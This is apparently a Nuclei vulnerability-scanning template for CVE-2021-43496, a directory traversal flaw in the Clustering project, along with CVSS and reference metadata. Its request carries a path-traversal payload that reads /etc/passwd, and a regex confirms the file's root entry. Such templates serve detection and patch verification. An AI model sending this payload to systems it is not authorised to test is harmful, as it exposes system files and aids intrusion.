37 lines
1.4 KiB
YAML
37 lines
1.4 KiB
YAML
id: CVE-2021-43496
|
|
|
|
info:
|
|
name: Clustering Local File Inclusion
|
|
author: Evan Rubinstein
|
|
severity: high
|
|
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/varun-suresh/Clustering/issues/12
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43496
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-43496
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03503
|
|
epss-percentile: 0.90533
|
|
cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: clustering_project
|
|
product: clustering
|
|
tags: cve,cve2021,lfi,clustering,clustering_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/img/../../../../../../etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a0047304502206ca834c964099d63898a327e8c8b8e0991bdca63c0f08fc4f48846508a2d6d82022100e25a4032c8465f03507f051db9c26782c650c515892150254b141cb0faa19ab8:922c64590222798bb761d5b6d8e72950 |